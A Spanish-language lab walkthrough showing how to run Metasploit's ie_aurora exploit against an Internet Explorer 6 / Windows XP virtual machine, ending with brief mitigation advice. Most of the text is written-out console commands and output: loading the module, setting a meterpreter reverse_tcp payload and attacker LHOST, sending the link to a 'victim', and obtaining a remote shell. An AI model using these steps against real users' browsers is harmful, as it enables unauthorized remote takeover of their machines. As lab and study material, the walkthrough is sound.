Laboratorio -- Metasploit - Exploit ie_aurora

Bueno creo que todos deben conocer del 0 day que tanto se hablo en estos ultimos tiempos sobre IE, lo que lograba un BOF pudiendo inyectar codigo arbitrario obteniendo una shell, aunque no todos son vulnerables hay una tablita que muestra que tan bien estan parados algunas versiones de windows conjuntamente con la version de IE, mas ahora sabiendo que los antivirus lo detectan..

Imagen de http://elladodelmal.blogspot.com/

El laboratorio se compone por una Virtual Machin ( VirtualBox, en el proximo post voy a explicar como intalarlo con yapa de Hacking! ) que tiene intalado un Windows XP SP3 con internet explorer Version 6.0, el cual es totalmente vulnerable. Por suerte es muy raro encontrar clientes navegando con esa version, pero .... :). Je..



Comenzando

Primero entonces nesesitamos el metasploit, lo podemos descargar desde aqui, busquen su arquitectura para linux hay de 32 bit y 64 bit (Yo me descargue este framework-3.3.3-linux-x86_64.run), tambien esta para windows pero el ultimo que baje no tenia el exploit aurora, pero se le puede agregar descargando el archivo con estension rb y colocarlo en la carpeta de exploit/windows/browser que seria lo ideal. Aqui el exploit.
Una vez intalado el metasploit, y que todo haya salido bien ( En linux nesesitamos intalar ruby ), nos dirigimos a la consola de metasploit.

/home/usuario# msfconsole

                                  _       _
_                   | |     (_)_
____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
       |_|


=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 320 exploits - 99 auxiliary
+ -- --=[ 217 payloads - 20 encoders - 6 nops
=[ svn r8438 updated yesterday (2010.02.09)

msf >

Una vez dentro de la consola de Metasploit, tenemos que elegir el exploit a utilizar

msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) > show options

Module options:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     0.0.0.0          yes       The local host to
listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

Id  Name
--  ----
0   Automatic

Una vez cargado el exploit con el comando use, podemos ver los argumentos que nesesita el exploit para poder funcionar con el comando show options.
Usaremos un PAYLOAD de reverse shell, para ello colocamos lo que sigue.

 msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

Bien empezamos a llenar los argumentos tanto del Payload como del EXPLOIT

msf exploit(ie_aurora) > set LHOST 190.18x.xxx.xxx
LHOST => 190.18x.xx.xxx
msf exploit(ie_aurora) > set URIPATH /
URIPATH => /
msf exploit(ie_aurora) > show options

Module options:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     0.0.0.0          yes       The local host to listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process
LHOST     190.18x.xx.xxx   yes       The local address
LPORT     4444             yes       The local port


Exploit target:

Id  Name
--  ----
0   Automatic

En la pantalla se ve como se setearon los valores cargados LHOST vendria a ser la ip del atacante. Largamos el exploit

msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Started reverse handler on 190.18x.xx.xxx:4444
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://190.18x.xx.xxx:8080/
[*] Server started.

El servidor lo tengo corriendo en la IP del argumento LHOST en el puerto 8080 y tendremos una reverse shell por el puerto 4444 :).
Ahora mandamos el enlace a la victima, y esperamos que ingrese.


Veamos nuestra consola de metasploit :)

[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 190.18x.xx.xxx
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (190.18x.xx.xxx:4444 -> 190.18x.xx.xxx:51513)
sessions -l

Active sessions
===============

Id  Description  Tunnel
--  -----------  ------
1   Meterpreter  190.18x.xx.xxx:4444 -> 190.18x.xx.xxx:51513

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: VICTIMA
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: es_ES

Vemos que tenemos la session con la victima, que tiene un Windows XP SP3.
Ahora vamos a la shell remota que es lo mejor :)

meterpreter > shell
Process 812 created.
Channel 1 created.
Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Victima 10\Escritorio>hostname
hostname
victima

C:\Documents and Settings\Victima 10\Escritorio>

Solucion

Navegar con un antivirus para este exploit seria lo mejor el NOD32 lo detecta y no deja inyectar, tambien no usar un IE explorer anticuado asi como el 6.x que fue hecho en esta POC. Mientras pasen cosas parecidas dejar de utilizar el software defectuoso hasta que la Empresa propietaria del mismo largue el parche, para cada programa siempre hay otro que realiza la misma accion, pudiendo elegirlo a ese temporarlmente.



Referencias:
http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html

http://foro.elhacker.net/hacking_avanzado/metasploit_0day_ie_exploit_ieaurora-t281678.0.html

Saludos